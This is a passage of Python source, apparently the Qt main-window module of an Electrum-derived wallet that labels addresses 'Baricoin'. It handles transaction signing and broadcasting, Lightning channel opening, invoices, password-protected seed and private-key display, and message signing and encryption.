preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
if self.wallet.lnworker.has_conflicting_backup_with(node_id):
msg = messages.MGS_CONFLICTING_BACKUP_INSTANCE
if not self.question(msg):
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_('Your wallet backup has been updated in {}').format(backup_dir))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ': ' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value) + ' ' + self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.update_lightning_icon()
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if not self.wallet.has_lightning():
self.lightning_button.setVisible(False)
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self, dialog):
assert not self.wallet.has_lightning()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
if self.question(msg):
self._init_lightning_dialog(dialog=dialog)
@protected
def _init_lightning_dialog(self, *, dialog, password):
dialog.close()
self.wallet.init_lightning(password=password)
self.update_lightning_icon()
self.show_message(_('Lightning keys have been initialized.'))
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Baricoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Baricoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
def cb(success: bool, error: str, data):
if not success:
if error:
self.show_error(error)
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
